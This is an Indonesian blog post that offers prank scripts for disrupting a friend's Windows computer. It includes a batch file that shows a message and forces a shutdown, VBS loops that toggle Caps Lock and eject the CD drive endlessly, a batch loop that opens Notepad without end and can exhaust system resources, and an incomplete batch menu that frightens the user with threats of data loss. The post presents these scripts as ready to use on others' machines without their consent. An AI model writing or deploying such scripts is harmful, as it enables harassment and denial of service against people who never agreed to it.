blog visitors

script tuk jahil kompter teman

Bagi teman-teman yang ingin mencoba menjahili komputer temannya,, saya akan berbagi sedikit scriptnya.
1.memberi pesan dan shutdown komputer.
Buka Notepad ketik script dibawah ini dan Save As menggunakan Extension .BAT

@echo off
msg * Aku tidak suka kamu
shutdown -c "Error! Kamu jelek sekali" -s  

2.Menyalakan tombol Caps lock secara simultan.
Buka Notepad ketik script dibawah ini dan Save As menggunakan Extension .VBS
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop


3) Buka/tutup CD drive secara terus menerus.
Buka Notepad ketik script dibawah ini dan Save As menggunakan Extension .VBS
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop 
4. Buka Notepad secara terus menerus.
Buka Notepad ketik script dibawah ini dan Save As menggunakan Extension .BAT

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

5. Munculin 5 pilihan yang harus korban pilih.
Buka Notepad ketik script dibawah ini dan Save As menggunakan Extension .BAT
@echo off
title The end of the world
cd C:\
:menu
cls
echo oops gw gak tanggung jawab lho apa yang barusan lu lakuin hehhe,,semuanya dh jadi tanggung jawab lu sendiri...
pause
echo pilih nama cwe yang lu suka =P :
echo 1. datanya bakal ilang lho.
echo 2. komputer nya corrupt lho
echo 3. heheh no comment deh klo yang ini
echo 4. mau mati pake jalan ini?
echo 5. bye bye...
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two
Mungkin itu ajah yang bisa saya sharing kepada blogger semua..
Kejahatan tetap kejahatan jadi bertobatlah sebelum anda di jahatkan kembali...!!!